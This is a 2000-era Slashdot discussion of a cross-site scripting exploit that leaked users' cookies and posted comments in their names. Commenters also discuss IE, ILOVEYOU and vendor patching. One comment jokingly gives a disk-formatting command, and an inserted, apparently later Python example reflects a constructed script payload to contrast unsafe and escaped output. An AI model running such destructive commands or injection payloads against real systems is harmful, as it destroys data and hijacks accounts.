  • You believe that disabling javascript or turning off cookies completely is an acceptable solution to this problem?

    If a security hole is found next week, in something that can't be disabled, will your suggestion be: "what's the big deal don't surf for a while. I'm sure Microsoft will have a patch out soon."

    While the post you're responding to did ramble, I think that a person is justified in being tired of the poor designs force fed to most of the world by Redmond.

    And the idea that we shouldn't get upset, because there will *probably* be a patch to fix the problem makes me sad. With that kind of thinking out there things aren't going to get better any time soon.
  • by bjb ( 3050 ) on Thursday May 11, 2000 @09:11AM (#1078142) Homepage Journal
    I don't know how well the tests were performed, but I just tried the test with IE 5 for Solaris and saw my cookie in all its glory.

    Hmm.. I only have IE for Solaris installed on this box for just such occasions.

    --

  • Yes, I too am impressed and obviously these techniques are pretty common knowledge in certain circles. I'm not saying that wasn't very slick!

    Ah, I'm sure he's trustworthy, but I changed my PW anyway :-)

    I had already, by coincidence, taken the step of linking my cookies file to /dev/null a couple of days ago, and have since been reflecting on the desirability of being able to script my browser so I can set up a quick link to a site that requires cookies, with cookies enabled, then turn them off and delete the cookies as soon as I'm done. I guess I'll use Mozilla for that. Yet another reason why Mozilla is really cool.

    Javascript is now off too. :-) Thanks for the clear demonstration. What a gaping security hole!

    Java is still enabled over here, though. Until somebody demonstrates to me why that's a security risk too...
    --
  • Now you've done it. First you refused to remove posts harmful to Microsoft's reputation and now you're exposing Microsoft trade secrets!

    Is this Slashdot slowdown just a coincidence? I think not. Slashdot is now the victim of an official Microsoft Denial of Service Attack.

    Slashdot has crossed the line and is hurting our American Company's Freedom to Innovate.

    Also, this temporary Explorer snafu makes it quite clear that Microsoft doesn't steal everything from open source!

    blessings,
    Master Bait

  • no, no, far easier:

    mkfs /dev/rwd0a

    -John
  • And here I am trying to dampen paranoia about cookies. (I love the Slashdot FAQ on cookies [slashdot.org].)

    But this bothers me and sounds similar to the bug reported at CookieCentral [cookiecentral.com] a long time ago. I'm trying to digest how this is different and what danger (and likelihood of appearance) this represents "in the wild".

    Answers here or to me by email would be appreciated.

  • "As to the ILOVEYOU stuff - to the best of my knowledge, you had to click on the .vbs file to activate it. You don't go around running executables do you? So this virus/trojan is nothing more than a case of uneducated users trusting something they shouldn't."

    You have to set an option to keep Outlook from automatically running .vbs files I believe. I don't think, for security's sake, that should even be an option.

    carlos

  • by RayChuang ( 10181 ) on Thursday May 11, 2000 @01:25PM (#1078156)
    If the folks at Peacefire did not report these problems to Microsoft's Security team, then they are essentially doing a major disservice to the public.

    Hopefully, they do know Microsoft's address for reporting security issues: secure@microsoft.com. That address is monitored 24 hours a day and the MS security folks will try to replicate the problem ASAP.
  • Fun with Amazon's One-Click Shopping, or "you mean you didn't order five hundred copies of Joy of Preteen Sex?"

    Doesn't Amazon's proprietary exclusive patented HANDS OFF IT'S OURS AND YOU CAN'T HAVE IT One-Click Shopping system use cookies to save buyers those arduous extra clicks? And doesn't this mean that someone using this exploit can then get your personal buyer's information? ("Your," not "my", at least until Amazon stops suing people right and left.)

    Gee, I guess it's a good thing that Amazon has defended their patent so vigorously, or else customers of other companies would be equally at risk.

    By the way, this is off-topic, but I figure readers would be amused. Who is to blame for the "ILOVEYOU" worm? Those funloving Filipino folks who wrote it? Microsoft, for making their scripting language so insecure and so easy to subvert? Why no. According to those geniuses [nytimes.com] in Congress, the $15-billion dollars in damages (I wonder why they didn't say "$15-trillion" or "$15-quadrillion" as long as they were pulling numbers out of thin air) are due to the slackness and irresponsibility of McAfee, the anti-virus vendor. I've got to be kidding, right? Well, check it out [nytimes.com].

    Yours WDK - WKiernan@concentric.net

  • Of course, you can place the orders using your Amazon Affiliate Store, giving yourself a small percentage. But I think that would make it a tad too obvious as to who the culprit was. Unless it was your friend's store. :)
  • I have no idea what they did. I know that _I_ reported a very similar issue (possibly due to the same root problem) with the exact same consequences to Microsoft two months ago and they have not yet released a fix.

    Sure, I got a quick response saying they were looking into it. Sure, they said they had developed a patch. But releasing it? Well... that didn't quite happen. It is true that I did not pressure them on it since I was busy with more important things, but I shouldn't have to.
  • Hot damn...gotta like being one of the Anonymous Cowards in that sid. Is anyone else concerned by the sheer number of people that went ahead and clicked it? Aren't you people the ones that are always crowing about how much smarter you are than the average "luser"? Everyone just believed that all that script would do is post a comment, just like a bunch of idiots believed that someone at Dow Jones sent them love letters.

    All it did was post a comment. There's a link to the source at sid=numb. It could have done worse though if I had added the javascript thing (provided you use Windows and IE.) As for clicking links no one is safe (unless they have redirection disabled.) I could e-mail a similar link and have it look completely benign, yet have it post something incredibly embarrassing.

    BTW, to find out more about it click here. [kuro5hin.org]

    or just go to http://www.kuro5hin.org/?op=displaystory&sid=2000/5/9/183550/1910 if you don't trust the link :)

    One other thing, I used a PHP script because Slashdot's software recognizes duplicate posts and I needed to make the content dynamic. However, for a targeted attack plain old HTML on a geocities web page would do the trick.

    numb
  • by pod ( 1103 ) on Thursday May 11, 2000 @12:00PM (#1078165) Homepage
    Ahh, this looks to be a slashdot specific exploit. It makes slashdot put your loginid and password in the url, and redirects back to the script thus transmitting the referrer.

    It's actually an exploit discussed on CERT [cert.org] where a malicious web site can embed some script in a link to a cgi script, which in turn pastes it into the resulting page unaltered and the victim's browser executes it.

    In this case the script is a bit of javascript that outputs your slashdot cookie via search.pl. All javascript enabled browsers are affected by this.

    It's just a result of sloppy coding.
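
The "sloppy coding" this post refers to is a CGI handler that pastes a request parameter into its HTML output unaltered. As an added example, not Slashdot's search.pl or CERT's code, here is that pattern in its 'before' form next to the hardened form that escapes request data before placing it in the page, plus a small check a reviewer can run over a response to spot the reflection. The handler names, the `q` parameter and the query string are constructed for the illustration.

```python
import html
from urllib.parse import parse_qs

# Constructed example, not Slashdot's search.pl: the 'before' and 'after' of
# the pattern CERT describes, a CGI-style handler that reflects a query
# parameter into the HTML it returns.


def render_results_unsafe(query_string):
    """'Before': the parameter is pasted into the page unaltered, so any
    markup a link smuggled in is interpreted by the visitor's browser."""
    q = parse_qs(query_string).get("q", [""])[0]
    return f"<p>Results for: {q}</p>"


def render_results_safe(query_string):
    """'After': everything that came from the request is HTML-escaped before
    it is placed in the page, so the browser shows the markup as plain text."""
    q = parse_qs(query_string).get("q", [""])[0]
    return f"<p>Results for: {html.escape(q, quote=True)}</p>"


def reflects_markup(page, raw_input):
    """Detection helper for a response: True if a request value containing
    '<' or '>' appears in the page byte-for-byte, i.e. unescaped."""
    return any(ch in raw_input for ch in "<>") and raw_input in page


# A constructed link payload of the kind the CERT advisory warns about,
# percent-encoded as it would travel in a query string, and its decoded form.
CONSTRUCTED_QUERY = "q=%3Cscript%3Ealert(1)%3C%2Fscript%3E"
CONSTRUCTED_RAW = "<script>alert(1)</script>"
```

The point the post makes holds regardless of browser: the script is supplied by whoever built the link, but it runs with the cookies of the site that echoed it, so the fix belongs on the server side, in the escaping, not in any one browser.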

  • Turning off Javascript or disabling stored cookies is an acceptable temporary solution to the problem.

    If a security hole is found that can't be worked around, then yes, wait for a patch. Same thing you would do with Netscape.

    Both Netscape and Microsoft IE have had security problems but Slashdot holds Microsoft to a different standard.

    Witness an OLD OLD bug:

    http://www.ciac.org/ciac/bulletins/i-040.shtml [ciac.org]

    Sounds familiar, doesn't it? What happened? It got fixed. And this certainly is not the only Netscape bug that has ever surfaced.

    Security problems are going to be discovered. Humans make mistakes. The key is to respond to the problems swiftly, and try not to rush products out the door without proper testing. I think both MS and Netscape were guilty of the latter for a long time.

    Best regards,

    SEAL

  • I can tell you for a fact that you had to open the attachment through Windows Scripting Host for it to do ANYTHING!

    Good for you. May I politely point out that scripting host is enabled by default - how is a clueless user going to know to turn it off? Second, I did hear that if you have the preview window open the script will execute without any further help from the user. Ugly. Caveat: I don't normally run Windows, so I didn't check this.
    --
  • > WARNING: Clicking this link will cause an article to be posted on Slashdot in your name

    Think how mad someone would be if all those 300+ posts (so far) had been copies of a certain "trade secret" that has been mentioned here lately.

    --
